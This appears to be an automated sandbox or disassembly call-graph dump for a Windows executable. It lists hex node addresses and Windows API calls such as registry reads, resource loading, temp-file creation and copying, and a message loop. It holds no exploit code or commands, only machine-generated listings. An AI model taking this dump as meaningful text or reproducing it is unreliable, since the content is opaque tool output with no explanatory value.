74 API calls 101974->101975 101976 3c9353 101975->101976 101977 364f0b 74 API calls 101976->101977 101978 3c9363 101977->101978 102311 3c98e3 GetTempPathW GetTempFileNameW 101978->102311 101980 3c936f 101981 38525b 115 API calls 101980->101981 101990 3c9380 101981->101990 101983 3c9445 101985 3c945f 101983->101985 101986 3c944b DeleteFileW 101983->101986 101984 364f0b 74 API calls 101984->101990 101987 3c9505 CopyFileW 101985->101987 101992 3c9469 _wcsncpy 101985->101992 101986->101961 101990->101961 101990->101984 101996 3c943a 101990->101996 102312 384863 101990->102312 102325 3853a6 101996->102325 101998->101763 101999->101777 102001 364e54 102000->102001 102002 364e5b 102000->102002 102003 3853a6 __fcloseall 83 API calls 102001->102003 102004 364e6a 102002->102004 102005 364e7b FreeLibrary 102002->102005 102003->102002 102004->101737 102005->102004 102055 364c03 102006->102055 102008 364bdc 102010 364bf5 102008->102010 102011 364bec FreeLibrary 102008->102011 102013 38525b 102010->102013 102011->102010 102012 364c03 2 API calls 102012->102008 102059 385270 102013->102059 102015 364dfc 102015->101816 102015->101817 102219 364c36 102016->102219 102019 364b8f 102020 364ba1 FreeLibrary 102019->102020 102021 364baa 102019->102021 102020->102021 102023 364c70 102021->102023 102022 364c36 2 API calls 102022->102019 102024 380db6 Mailbox 59 API calls 102023->102024 102025 364c85 102024->102025 102223 36522e 102025->102223 102027 364c91 _memmove 102028 364ccc 102027->102028 102030 364dc1 102027->102030 102031 364d89 102027->102031 102029 364ec7 69 API calls 102028->102029 102038 364cd5 102029->102038 102237 3c991b 95 API calls 102030->102237 102226 364e89 CreateStreamOnHGlobal 102031->102226 102034 364f0b 74 API calls 102034->102038 102036 364d69 102036->101825 102037 39d8a7 102039 364ee5 85 API calls 102037->102039 102038->102034 102038->102036 102038->102037 102232 364ee5 102038->102232 102040 39d8bb 102039->102040 102041 364f0b 74 API calls 102040->102041 102041->102036 102043 39d9cd 102042->102043 102044 364f1d 102042->102044 102261 3855e2 102044->102261 102047 3c9109 102281 3c8f5f 102047->102281 102049 3c911f 102049->101832 102051 364ed6 102050->102051 102052 39d990 102050->102052 102286 385c60 102051->102286 102054 364ede 102056 364bd0 102055->102056 102057 364c0c LoadLibraryA 102055->102057 102056->102008 102056->102012 102057->102056 102058 364c1d GetProcAddress 102057->102058 102058->102056 102062 38527c _wprintf 102059->102062 102060 38528f 102108 388b28 58 API calls __getptd_noexit 102060->102108 102062->102060 102064 3852c0 102062->102064 102063 385294 102109 388db6 9 API calls __wctomb_s_l 102063->102109 102078 3904e8 102064->102078 102067 3852c5 102068 3852db 102067->102068 102069 3852ce 102067->102069 102070 385305 102068->102070 102071 3852e5 102068->102071 102110 388b28 58 API calls __getptd_noexit 102069->102110 102093 390607 102070->102093 102111 388b28 58 API calls __getptd_noexit 102071->102111 102075 38529f _wprintf @_EH4_CallFilterFunc@8 102075->102015 102079 3904f4 _wprintf 102078->102079 102080 389c0b __lock 58 API calls 102079->102080 102086 390502 102080->102086 102081 39057d 102118 38881d 58 API calls 2 library calls 102081->102118 102084 3905f3 _wprintf 102084->102067 102085 390584 102091 390576 102085->102091 102119 389e2b InitializeCriticalSectionAndSpinCount 102085->102119 102086->102081 102088 389c93 __mtinitlocknum 58 API calls 102086->102088 102086->102091 102116 386c50 59 API calls __lock 102086->102116 102117 386cba LeaveCriticalSection LeaveCriticalSection _doexit 102086->102117 102088->102086 102090 3905aa EnterCriticalSection 102090->102091 102113 3905fe 102091->102113 102102 390627 __wopenfile 102093->102102 102094 390641 102124 388b28 58 API calls __getptd_noexit 102094->102124 102095 3907fc 102095->102094 102099 39085f 102095->102099 102097 390646 102125 388db6 9 API calls __wctomb_s_l 102097->102125 102121 3985a1 102099->102121 102100 385310 102112 385332 LeaveCriticalSection LeaveCriticalSection __wfsopen 102100->102112 102102->102094 102102->102095 102126 3837cb 60 API calls 2 library calls 102102->102126 102104 3907f5 102104->102095 102127 3837cb 60 API calls 2 library calls 102104->102127 102106 390814 102106->102095 102128 3837cb 60 API calls 2 library calls 102106->102128 102108->102063 102109->102075 102110->102075 102111->102075 102112->102075 102120 389d75 LeaveCriticalSection 102113->102120 102115 390605 102115->102084 102116->102086 102117->102086 102118->102085 102119->102090 102120->102115 102129 397d85 102121->102129 102123 3985ba 102123->102100 102124->102097 102125->102100 102126->102104 102127->102106 102128->102095 102130 397d91 _wprintf 102129->102130 102131 397da7 102130->102131 102133 397ddd 102130->102133 102216 388b28 58 API calls __getptd_noexit 102131->102216 102140 397e4e 102133->102140 102134 397dac 102217 388db6 9 API calls __wctomb_s_l 102134->102217 102137 397df9 102218 397e22 LeaveCriticalSection __unlock_fhandle 102137->102218 102139 397db6 _wprintf 102139->102123 102141 397e6e 102140->102141 102142 3844ea __wsopen_nolock 58 API calls 102141->102142 102146 397e8a 102142->102146 102143 397fc1 102144 388dc6 __invoke_watson 8 API calls 102143->102144 102145 3985a0 102144->102145 102147 397d85 __wsopen_helper 103 API calls 102145->102147 102146->102143 102148 397ec4 102146->102148 102155 397ee7 102146->102155 102149 3985ba 102147->102149 102150 388af4 __wsopen_nolock 58 API calls 102148->102150 102149->102137 102151 397ec9 102150->102151 102152 388b28 __wctomb_s_l 58 API calls 102151->102152 102153 397ed6 102152->102153 102156 388db6 __wctomb_s_l 9 API calls 102153->102156 102154 397fa5 102157 388af4 __wsopen_nolock 58 API calls 102154->102157 102155->102154 102162 397f83 102155->102162 102158 397ee0 102156->102158 102159 397faa 102157->102159 102158->102137 102160 388b28 __wctomb_s_l 58 API calls 102159->102160 102161 397fb7 102160->102161 102163 388db6 __wctomb_s_l 9 API calls 102161->102163 102164 38d294 __alloc_osfhnd 61 API calls 102162->102164 102163->102143 102165 398051 102164->102165 102166 39805b 102165->102166 102167 39807e 102165->102167 102169 388af4 __wsopen_nolock 58 API calls 102166->102169 102168 397cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102167->102168 102179 3980a0 102168->102179 102170 398060 102169->102170 102171 388b28 __wctomb_s_l 58 API calls 102170->102171 102173 39806a 102171->102173 102172 39811e GetFileType 102174 398129 GetLastError 102172->102174 102175 39816b 102172->102175 102177 388b28 __wctomb_s_l 58 API calls 102173->102177 102178 388b07 __dosmaperr 58 API calls 102174->102178 102186 38d52a __set_osfhnd 59 API calls 102175->102186 102176 3980ec GetLastError 102180 388b07 __dosmaperr 58 API calls 102176->102180 102177->102158 102181 398150 CloseHandle 102178->102181 102179->102172 102179->102176 102182 397cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102179->102182 102183 398111 102180->102183 102181->102183 102184 39815e 102181->102184 102185 3980e1 102182->102185 102187 388b28 __wctomb_s_l 58 API calls 102183->102187 102188 388b28 __wctomb_s_l 58 API calls 102184->102188 102185->102172 102185->102176 102190 398189 102186->102190 102187->102143 102189 398163 102188->102189 102189->102183 102191 398344 102190->102191 102192 3918c1 __lseeki64_nolock 60 API calls 102190->102192 102207 39820a 102190->102207 102191->102143 102193 398517 CloseHandle 102191->102193 102194 3981f3 102192->102194 102195 397cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102193->102195 102197 388af4 __wsopen_nolock 58 API calls 102194->102197 102212 398212 102194->102212 102196 39853e 102195->102196 102199 398546 GetLastError 102196->102199 102215 3983ce 102196->102215 102197->102207 102198 390e5b 70 API calls __read_nolock 102198->102212 102200 388b07 __dosmaperr 58 API calls 102199->102200 102201 398552 102200->102201 102204 38d43d __free_osfhnd 59 API calls 102201->102204 102202 390add __close_nolock 61 API calls 102202->102212 102203 3997a2 __chsize_nolock 82 API calls 102203->102212 102204->102215 102205 3918c1 60 API calls __lseeki64_nolock 102205->102207 102206 38d886 __write 78 API calls 102206->102207 102207->102191 102207->102205 102207->102206 102207->102212 102208 3983c1 102209 390add __close_nolock 61 API calls 102208->102209 102211 3983c8 102209->102211 102210 3983aa 102210->102191 102214 388b28 __wctomb_s_l 58 API calls 102211->102214 102212->102198 102212->102202 102212->102203 102212->102207 102212->102208 102212->102210 102213 3918c1 60 API calls __lseeki64_nolock 102212->102213 102213->102212 102214->102215 102215->102143 102216->102134 102217->102139 102218->102139 102220 364b83 102219->102220 102221 364c3f LoadLibraryA 102219->102221 102220->102019 102220->102022 102221->102220 102222 364c50 GetProcAddress 102221->102222 102222->102220 102224 380db6 Mailbox 59 API calls 102223->102224 102225 365240 102224->102225 102225->102027 102227 364ea3 FindResourceExW 102226->102227 102231 364ec0 102226->102231 102228 39d933 LoadResource 102227->102228 102227->102231 102229 39d948 SizeofResource 102228->102229 102228->102231 102230 39d95c LockResource 102229->102230 102229->102231 102230->102231 102231->102028 102233 39d9ab 102232->102233 102234 364ef4 102232->102234 102238 38584d 102234->102238 102236 364f02 102236->102038 102237->102028 102239 385859 _wprintf 102238->102239 102240 38586b 102239->102240 102242 385891 102239->102242 102251 388b28 58 API calls __getptd_noexit 102240->102251 102253 386c11 102242->102253 102243 385870 102252 388db6 9 API calls __wctomb_s_l 102243->102252 102248 3858a6 102260 3858c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 102248->102260 102249 38587b _wprintf 102249->102236 102251->102243 102252->102249 102254 386c21 102253->102254 102255 386c43 EnterCriticalSection 102253->102255 102254->102255 102257 386c29 102254->102257 102256 385897 102255->102256 102259 3857be 83 API calls 5 library calls 102256->102259 102258 389c0b __lock 58 API calls 102257->102258 102258->102256 102259->102248 102260->102249 102264 3855fd 102261->102264 102263 364f2e 102263->102047 102265 385609 _wprintf 102264->102265 102266 38564c 102265->102266 102267 38561f _memset 102265->102267 102268 385644 _wprintf 102265->102268 102269 386c11 __lock_file 59 API calls 102266->102269 102277 388b28 58 API calls __getptd_noexit 102267->102277 102268->102263 102271 385652 102269->102271 102279 38541d 72 API calls 6 library calls 102271->102279 102272 385639 102278 388db6 9 API calls __wctomb_s_l 102272->102278 102274 385668 102280 385686 LeaveCriticalSection LeaveCriticalSection __wfsopen 102274->102280 102277->102272 102278->102268 102279->102274 102280->102268 102284 38520a GetSystemTimeAsFileTime 102281->102284 102283 3c8f6e 102283->102049 102285 385238 __aulldiv 102284->102285 102285->102283 102287 385c6c _wprintf 102286->102287 102288 385c7e 102287->102288 102289 385c93 102287->102289 102300 388b28 58 API calls __getptd_noexit 102288->102300 102291 386c11 __lock_file 59 API calls 102289->102291 102293 385c99 102291->102293 102292 385c83 102301 388db6 9 API calls __wctomb_s_l 102292->102301 102302 3858d0 67 API calls 6 library calls 102293->102302 102296 385c8e _wprintf 102296->102054 102297 385ca4 102303 385cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 102297->102303 102299 385cb6 102299->102296 102300->102292 102301->102296 102302->102297 102303->102299 102305 367da6 102304->102305 102306 367d99 102304->102306 102307 380db6 Mailbox 59 API calls 102305->102307 102306->101854 102307->102306 102308->101881 102309->101927 102310->101929 102311->101980 102313 38486f _wprintf 102312->102313 102314 38488d 102313->102314 102315 3848a5 102313->102315 102317 38489d _wprintf 102313->102317 102362 388b28 58 API calls __getptd_noexit 102314->102362 102318 386c11 __lock_file 59 API calls 102315->102318 102317->101990 102319 3848ab 102318->102319 102350 38470a 102319->102350 102320 384892 102363 388db6 9 API calls __wctomb_s_l 102320->102363 102326 3853b2 _wprintf 102325->102326 102327 3853de 102326->102327 102328 3853c6 102326->102328 102331 386c11 __lock_file 59 API calls 102327->102331 102334 3853d6 _wprintf 102327->102334 102545 388b28 58 API calls __getptd_noexit 102328->102545 102330 3853cb 102546 388db6 9 API calls __wctomb_s_l 102330->102546 102333 3853f0 102331->102333 102529 38533a 102333->102529 102334->101983 102346 3c9748 __tzset_nolock _wcscmp 102341->102346 102342 3c9210 102342->101961 102347 3840fb 58 API calls __wsplitpath_helper 102342->102347 102343 364f0b 74 API calls 102343->102346 102344 3c9109 GetSystemTimeAsFileTime 102344->102346 102345 364ee5 85 API calls 102345->102346 102346->102342 102346->102343 102346->102344 102346->102345 102347->101963 102348->101971 102353 384719 102350->102353 102356 384737 102350->102356 102351 384727 102353->102351 102353->102356 102360 384751 _memmove 102353->102360 102364 3848dd LeaveCriticalSection LeaveCriticalSection __wfsopen 102356->102364 102360->102356 102362->102320 102363->102317 102364->102317 102530 385349 102529->102530 102531 38535d 102529->102531 102545->102330 102546->102334 102624 36818f 102623->102624 102627 3681aa 102623->102627 102625 367e4f 59 API calls 102624->102625 102626 368197 CharUpperBuffW 102625->102626 102626->102627 102627->101638 102629 36f251 102628->102629 102630 36f272 102629->102630 102756 3c9e4a 90 API calls 4 library calls 102629->102756 102630->101677 102633 39edbd 102632->102633 102634 36838d 102632->102634 102635 380db6 Mailbox 59 API calls 102634->102635 102636 368394 102635->102636 102637 3683b5 102636->102637 102757 368634 59 API calls Mailbox 102636->102757 102637->101655 102637->101664 102640 3a4cc3 102639->102640 102652 3709f5 102639->102652 102804 3c9e4a 90 API calls 4 library calls 102640->102804 102642 370ce4 102643 370cfa 102642->102643 102801 371070 10 API calls Mailbox 102642->102801 102643->101693 102645 370ee4 102645->102643 102647 370ef1 102645->102647 102802 371093 342 API calls Mailbox 102647->102802 102648 370a4b PeekMessageW 102658 370a05 Mailbox 102648->102658 102651 370ef8 LockWindowUpdate DestroyWindow GetMessageW 102651->102643 102654 370f2a 102651->102654 102652->102658 102805 369e5d 60 API calls 102652->102805 102806 3b6349 342 API calls 102652->102806 102653 3a4e81 Sleep 102653->102658 102656 3a5c58 TranslateMessage DispatchMessageW GetMessageW 102654->102656 102656->102656 102657 3a5c88 102656->102657 102657->102643 102658->102642 102658->102648 102658->102653 102659 369e5d 60 API calls 102658->102659 102660 370ea5 TranslateMessage DispatchMessageW 102658->102660 102661 370e43 PeekMessageW 102658->102661 102662 3a4d50 TranslateAcceleratorW 102658->102662 102663 380db6 59 API calls Mailbox 102658->102663 102664 370d13 timeGetTime 102658->102664 102665 3a581f WaitForSingleObject 102658->102665 102667 370e5f Sleep 102658->102667 102668 368047 59 API calls 102658->102668 102671 3a5af8 Sleep 102658->102671 102675 370f4e timeGetTime 102658->102675 102679 369837 85 API calls 102658->102679 102695 369ea0 315 API calls 102658->102695 102696 36f460 315 API calls 102658->102696 102697 36fce0 315 API calls 102658->102697 102699 370e70 Mailbox 102658->102699 102700 367de1 59 API calls 102658->102700 102701 370f95 102658->102701 102704 3c9e4a 90 API calls 102658->102704 102705 3689b3 69 API calls 102658->102705 102706 369c90 59 API calls Mailbox 102658->102706 102707 3684c0 69 API calls 102658->102707 102708 3682df 59 API calls 102658->102708 102709 3b617e 59 API calls Mailbox 102658->102709 102710 3a55d5 VariantClear 102658->102710 102711 368cd4 59 API calls Mailbox 102658->102711 102712 3a566b VariantClear 102658->102712 102713 3a5419 VariantClear 102658->102713 102714 3b6e8f 59 API calls 102658->102714 102715 36b73c 315 API calls 102658->102715 102758 36e420 102658->102758 102765 36e6a0 102658->102765 102796 3631ce 102658->102796 102807 3e6018 59 API calls 102658->102807 102808 3c9a15 59 API calls Mailbox 102658->102808 102809 3bd4f2 59 API calls 102658->102809 102810 3b60ef 59 API calls 2 library calls 102658->102810 102811 368401 59 API calls 102658->102811 102659->102658 102660->102661 102661->102658 102662->102658 102662->102661 102663->102658 102664->102658 102665->102658 102670 3a583c GetExitCodeProcess CloseHandle 102665->102670 102667->102699 102668->102658 102669 367667 59 API calls 102669->102699 102670->102701 102671->102699 102673 38049f timeGetTime 102673->102699 102803 369e5d 60 API calls 102675->102803 102678 3a5b8f GetExitCodeProcess 102683 3a5bbb CloseHandle 102678->102683 102684 3a5ba5 WaitForSingleObject 102678->102684 102679->102658 102681 3e5f25 111 API calls 102681->102699 102682 36b7dd 110 API calls 102682->102699 102683->102699 102684->102658 102684->102683 102686 3a5874 102686->102701 102687 3a5c17 Sleep 102687->102658 102688 3a5078 Sleep 102688->102658 102691 367de1 59 API calls 102691->102699 102695->102658 102696->102658 102697->102658 102699->102658 102699->102669 102699->102673 102699->102678 102699->102681 102699->102682 102699->102686 102699->102687 102699->102688 102699->102691 102699->102701 102812 3c2408 60 API calls 102699->102812 102813 369e5d 60 API calls 102699->102813 102814 3689b3 69 API calls Mailbox 102699->102814 102815 36b73c 342 API calls 102699->102815 102816 3b64da 60 API calls 102699->102816 102817 3c5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 102699->102817 102818 3c3c55 66 API calls Mailbox 102699->102818 102700->102658 102701->101693 102704->102658 102705->102658 102706->102658 102707->102658 102708->102658 102709->102658 102710->102658 102711->102658 102712->102658 102713->102658 102714->102658 102715->102658 102717 39eda1 102716->102717 102720 3682f2 102716->102720 102718 39edb1 102717->102718 102829 3b61a4 59 API calls 102717->102829 102721 36831c 102720->102721 102722 368339 Mailbox 102720->102722 102723 3685c0 59 API calls 102720->102723 102724 368322 102721->102724 102725 3685c0 59 API calls 102721->102725 102722->101680 102723->102721 102724->102722 102726 369c90 Mailbox 59 API calls 102724->102726 102725->102724 102726->102722 102727->101679 102728->101679 102729->101639 102730->101696 102731->101648 102732->101696 102733->101696 102734->101654 102735->101665 102736->101660 102737->101660 102739 3685ce 102738->102739 102743 3685f6 102738->102743 102740 3685dc 102739->102740 102741 3685c0 59 API calls 102739->102741 102742 3685e2 102740->102742 102744 3685c0 59 API calls 102740->102744 102741->102740 102742->102743 102745 369c90 Mailbox 59 API calls 102742->102745 102743->101663 102744->102742 102745->102743 102746->101679 102747->101679 102748->101679 102750 3684cb 102749->102750 102752 3684f2 102750->102752 102830 3689b3 69 API calls Mailbox 102750->102830 102752->101694 102753->101696 102754->101695 102755->101696 102756->102630 102757->102637 102759 36e451 102758->102759 102760 36e43d 102758->102760 102820 3c9e4a 90 API calls 4 library calls 102759->102820 102819 36df00 342 API calls 2 library calls 102760->102819 102763 36e448 102763->102658 102764 3a3aa4 102764->102764 102766 36e6d5 102765->102766 102767 3a3aa9 102766->102767 102770 36e73f 102766->102770 102779 36e799 102766->102779 102768 369ea0 342 API calls 102767->102768 102769 3a3abe 102768->102769 102783 36e970 Mailbox 102769->102783 102822 3c9e4a 90 API calls 4 library calls 102769->102822 102773 367667 59 API calls 102770->102773 102770->102779 102771 367667 59 API calls 102771->102779 102774 3a3b04 102773->102774 102776 382d40 __cinit 67 API calls 102774->102776 102775 382d40 __cinit 67 API calls 102775->102779 102776->102779 102777 3a3b26 102777->102658 102778 3684c0 69 API calls 102778->102783 102779->102771 102779->102775 102779->102777 102780 36e95a 102779->102780 102779->102783 102780->102783 102823 3c9e4a 90 API calls 4 library calls 102780->102823 102782 369ea0 342 API calls 102782->102783 102783->102778 102783->102782 102784 368d40 59 API calls 102783->102784 102785 36f195 102783->102785 102786 369c90 Mailbox 59 API calls 102783->102786 102794 3c9e4a 90 API calls 102783->102794 102795 36ea78 102783->102795 102821 367f77 59 API calls 2 library calls 102783->102821 102824 3b6e8f 59 API calls 102783->102824 102825 3dc5c3 342 API calls 102783->102825 102826 3db53c 342 API calls Mailbox 102783->102826 102828 3d93c6 342 API calls Mailbox 102783->102828 102784->102783 102827 3c9e4a 90 API calls 4 library calls 102785->102827 102786->102783 102793 3a3e25 102793->102658 102794->102783 102795->102658 102797 363212 102796->102797 102798 3631e0 102796->102798 102797->102658 102798->102797 102799 363205 IsDialogMessageW 102798->102799 102800 39cf32 GetClassLongW 102798->102800 102799->102797 102799->102798 102800->102798 102800->102799 102801->102645 102802->102651 102803->102658 102804->102652 102805->102652 102806->102652 102807->102658 102808->102658 102809->102658 102810->102658 102811->102658 102812->102699 102813->102699 102814->102699 102815->102699 102816->102699 102817->102699 102818->102699 102819->102763 102820->102764 102821->102783 102822->102783 102823->102783 102824->102783 102825->102783 102826->102783 102827->102793 102828->102783 102829->102718 102830->102752 102832 3b60cb 102831->102832 102833 3b60e8 102831->102833 102832->102833 102835 3b60ab 59 API calls Mailbox 102832->102835 102833->101389 102835->102832 102836->101396 102837->101403 102838->101403 102839 36107d 102844 36708b 102839->102844 102841 36108c 102842 382d40 __cinit 67 API calls 102841->102842 102843 361096 102842->102843 102845 36709b __ftell_nolock 102844->102845 102846 367667 59 API calls 102845->102846 102847 367151 102846->102847 102875 364706 102847->102875 102849 36715a 102882 38050b 102849->102882 102852 367cab 59 API calls 102853 367173 102852->102853 102888 363f74 102853->102888 102856 367667 59 API calls 102857 36718b 102856->102857 102858 367d8c 59 API calls 102857->102858 102859 367194 RegOpenKeyExW 102858->102859 102860 39e8b1 RegQueryValueExW 102859->102860 102865 3671b6 Mailbox 102859->102865 102861 39e8ce 102860->102861 102862 39e943 RegCloseKey 102860->102862 102863 380db6 Mailbox 59 API calls 102861->102863 102862->102865 102874 39e955 _wcscat Mailbox __wsetenvp 102862->102874 102864 39e8e7 102863->102864 102866 36522e 59 API calls 102864->102866 102865->102841 102867 39e8f2 RegQueryValueExW 102866->102867 102868 39e90f 102867->102868 102871 39e929 102867->102871 102869 367bcc 59 API calls 102868->102869 102869->102871 102870 3679f2 59 API calls 102870->102874 102871->102862 102872 367de1 59 API calls 102872->102874 102873 363f74 59 API calls 102873->102874 102874->102865 102874->102870 102874->102872 102874->102873 102894 391940 102875->102894 102878 367de1 59 API calls 102879 364739 102878->102879 102896 364750 102879->102896 102881 364743 Mailbox 102881->102849 102883 391940 __ftell_nolock 102882->102883 102884 380518 GetFullPathNameW 102883->102884 102885 38053a 102884->102885 102886 367bcc 59 API calls 102885->102886 102887 367165 102886->102887 102887->102852 102889 363f82 102888->102889 102893 363fa4 _memmove 102888->102893 102891 380db6 Mailbox 59 API calls 102889->102891 102890 380db6 Mailbox 59 API calls 102892 363fb8 102890->102892 102891->102893 102892->102856 102893->102890 102895 364713 GetModuleFileNameW 102894->102895 102895->102878 102897 391940 __ftell_nolock 102896->102897 102898 36475d GetFullPathNameW 102897->102898 102899 36477c 102898->102899 102900 364799 102898->102900 102901 367bcc 59 API calls 102899->102901 102902 367d8c 59 API calls 102900->102902 102903 364788 102901->102903 102902->102903 102904 367726 59 API calls 102903->102904 102905 364794 102904->102905 102905->102881 102906 36e5ab 102909 36d100 102906->102909 102908 36e5b9 102910 36d37d 102909->102910 102911 36d11d 102909->102911 102923 36d54b 102910->102923 102957 3c9e4a 90 API calls 4 library calls 102910->102957 102912 3a26e0 102911->102912 102913 3a2691 102911->102913 102942 36d144 102911->102942 102953 3da3e6 342 API calls __cinit 102912->102953 102916 3a2694 102913->102916 102919 3a26af 102913->102919 102917 3a26a0 102916->102917 102916->102942 102951 3da9fa 342 API calls 102917->102951 102919->102910 102952 3daea2 342 API calls 3 library calls 102919->102952 102920 382d40 __cinit 67 API calls 102920->102942 102922 3a28b5 102922->102922 102923->102908 102924 36d434 102945 368a52 68 API calls 102924->102945 102928 36d443 102928->102908 102929 3a27fc 102956 3da751 90 API calls 102929->102956 102933 3684c0 69 API calls 102933->102942 102938 369d3c 60 API calls 102938->102942 102939 369ea0 342 API calls 102939->102942 102940 368047 59 API calls 102940->102942 102942->102910 102942->102920 102942->102923 102942->102924 102942->102929 102942->102933 102942->102938 102942->102939 102942->102940 102943 368740 68 API calls __cinit 102942->102943 102944 368542 68 API calls 102942->102944 102946 36843a 68 API calls 102942->102946 102947 36cf7c 342 API calls 102942->102947 102948 369dda 59 API calls Mailbox 102942->102948 102949 36cf00 90 API calls 102942->102949 102950 36cd7d 342 API calls 102942->102950 102954 368a52 68 API calls 102942->102954 102955 3b678d 60 API calls 102942->102955 102943->102942 102944->102942 102945->102928 102946->102942 102947->102942 102948->102942 102949->102942 102950->102942 102951->102923 102952->102910 102953->102942 102954->102942 102955->102942 102956->102910 102957->102922 102958 39fe27 102971 37f944 102958->102971 102960 39fe3d 102961 39fe53 102960->102961 102962 39febe 102960->102962 102980 369e5d 60 API calls 102961->102980 102965 36fce0 342 API calls 102962->102965 102964 39fe92 102966 39fe9a 102964->102966 102967 3a089c 102964->102967 102970 39feb2 Mailbox 102965->102970 102981 3c834f 59 API calls Mailbox 102966->102981 102982 3c9e4a 90 API calls 4 library calls 102967->102982 102972 37f962 102971->102972 102973 37f950 102971->102973 102975 37f991 102972->102975 102976 37f968 102972->102976 102974 369d3c 60 API calls 102973->102974 102979 37f95a 102974->102979 102977 369d3c 60 API calls 102975->102977 102978 380db6 Mailbox 59 API calls 102976->102978 102977->102979 102978->102979 102979->102960 102980->102964 102981->102970 102982->102970 102983 387c56 102984 387c62 _wprintf 102983->102984 103020 389e08 GetStartupInfoW 102984->103020 102987 387c67 103022 388b7c GetProcessHeap 102987->103022 102988 387cbf 102989 387cca 102988->102989 103105 387da6 58 API calls 3 library calls 102988->103105 103023 389ae6 102989->103023 102992 387cd0 102994 387cdb __RTC_Initialize 102992->102994 103106 387da6 58 API calls 3 library calls 102992->103106 103044 38d5d2 102994->103044 102996 387cea 102997 387cf6 GetCommandLineW 102996->102997 103107 387da6 58 API calls 3 library calls 102996->103107 103063 394f23 GetEnvironmentStringsW 102997->103063 103000 387cf5 103000->102997 103003 387d10 103004 387d1b 103003->103004 103108 3830b5 58 API calls 3 library calls 103003->103108 103073 394d58 103004->103073 103007 387d21 103008 387d2c 103007->103008 103109 3830b5 58 API calls 3 library calls 103007->103109 103087 3830ef 103008->103087 103011 387d34 103012 387d3f __wwincmdln 103011->103012 103110 3830b5 58 API calls 3 library calls 103011->103110 103093 3647d0 103012->103093 103015 387d53 103016 387d62 103015->103016 103111 383358 58 API calls _doexit 103015->103111 103112 3830e0 58 API calls _doexit 103016->103112 103019 387d67 _wprintf 103021 389e1e 103020->103021 103021->102987 103022->102988 103113 383187 36 API calls 2 library calls 103023->103113 103025 389aeb 103114 389d3c InitializeCriticalSectionAndSpinCount __mtinitlocknum 103025->103114 103027 389af0 103028 389af4 103027->103028 103116 389d8a TlsAlloc 103027->103116 103115 389b5c 61 API calls 2 library calls 103028->103115 103031 389af9 103031->102992 103032 389b06 103032->103028 103033 389b11 103032->103033 103117 3887d5 103033->103117 103036 389b53 103125 389b5c 61 API calls 2 library calls 103036->103125 103039 389b58 103039->102992 103040 389b32 103040->103036 103041 389b38 103040->103041 103124 389a33 58 API calls 4 library calls 103041->103124 103043 389b40 GetCurrentThreadId 103043->102992 103045 38d5de _wprintf 103044->103045 103046 389c0b __lock 58 API calls 103045->103046 103047 38d5e5 103046->103047 103048 3887d5 __calloc_crt 58 API calls 103047->103048 103049 38d5f6 103048->103049 103050 38d661 GetStartupInfoW 103049->103050 103051 38d601 _wprintf @_EH4_CallFilterFunc@8 103049->103051 103057 38d676 103050->103057 103060 38d7a5 103050->103060 103051->102996 103052 38d86d 103139 38d87d LeaveCriticalSection _doexit 103052->103139 103054 3887d5 __calloc_crt 58 API calls 103054->103057 103055 38d7f2 GetStdHandle 103055->103060 103056 38d805 GetFileType 103056->103060 103057->103054 103059 38d6c4 103057->103059 103057->103060 103058 38d6f8 GetFileType 103058->103059 103059->103058 103059->103060 103137 389e2b InitializeCriticalSectionAndSpinCount 103059->103137 103060->103052 103060->103055 103060->103056 103138 389e2b InitializeCriticalSectionAndSpinCount 103060->103138 103064 387d06 103063->103064 103065 394f34 103063->103065 103069 394b1b GetModuleFileNameW 103064->103069 103140 38881d 58 API calls 2 library calls 103065->103140 103067 394f5a _memmove 103068 394f70 FreeEnvironmentStringsW 103067->103068 103068->103064 103070 394b4f _wparse_cmdline 103069->103070 103072 394b8f _wparse_cmdline 103070->103072 103141 38881d 58 API calls 2 library calls 103070->103141 103072->103003 103074 394d69 103073->103074 103075 394d71 __wsetenvp 103073->103075 103074->103007 103076 3887d5 __calloc_crt 58 API calls 103075->103076 103077 394d9a __wsetenvp 103076->103077 103077->103074 103079 3887d5 __calloc_crt 58 API calls 103077->103079 103080 394df1 103077->103080 103081 394e16 103077->103081 103084 394e2d 103077->103084 103142 394607 58 API calls __wctomb_s_l 103077->103142 103078 382d55 _free 58 API calls 103078->103074 103079->103077 103080->103078 103082 382d55 _free 58 API calls 103081->103082 103082->103074 103143 388dc6 IsProcessorFeaturePresent 103084->103143 103086 394e39 103086->103007 103089 3830fb __IsNonwritableInCurrentImage 103087->103089 103158 38a4d1 103089->103158 103090 383119 __initterm_e 103091 382d40 __cinit 67 API calls 103090->103091 103092 383138 __cinit __IsNonwritableInCurrentImage 103090->103092 103091->103092 103092->103011 103094 364889 103093->103094 103095 3647ea 103093->103095 103094->103015 103096 364824 IsThemeActive 103095->103096 103161 38336c 103096->103161 103100 364850 103173 3648fd SystemParametersInfoW SystemParametersInfoW 103100->103173 103102 36485c 103174 363b3a 103102->103174 103104 364864 SystemParametersInfoW 103104->103094 103105->102989 103106->102994 103107->103000 103111->103016 103112->103019 103113->103025 103114->103027 103115->103031 103116->103032 103118 3887dc 103117->103118 103120 388817 103118->103120 103122 3887fa 103118->103122 103126 3951f6 103118->103126 103120->103036 103123 389de6 TlsSetValue 103120->103123 103122->103118 103122->103120 103134 38a132 Sleep 103122->103134 103123->103040 103124->103043 103125->103039 103127 395201 103126->103127 103132 39521c 103126->103132 103128 39520d 103127->103128 103127->103132 103135 388b28 58 API calls __getptd_noexit 103128->103135 103129 39522c HeapAlloc 103131 395212 103129->103131 103129->103132 103131->103118 103132->103129 103132->103131 103136 3833a1 DecodePointer 103132->103136 103134->103122 103135->103131 103136->103132 103137->103059 103138->103060 103139->103051 103140->103067 103141->103072 103142->103077 103144 388dd1 103143->103144 103149 388c59 103144->103149 103148 388dec 103148->103086 103150 388c73 _memset __call_reportfault 103149->103150 103151 388c93 IsDebuggerPresent 103150->103151 103157 38a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 103151->103157 103153 38c5f6 __ld12tod 6 API calls 103155 388d7a 103153->103155 103154 388d57 __call_reportfault 103154->103153 103156 38a140 GetCurrentProcess TerminateProcess 103155->103156 103156->103148 103157->103154 103159 38a4d4 EncodePointer 103158->103159 103159->103159 103160 38a4ee 103159->103160 103160->103090 103162 389c0b __lock 58 API calls 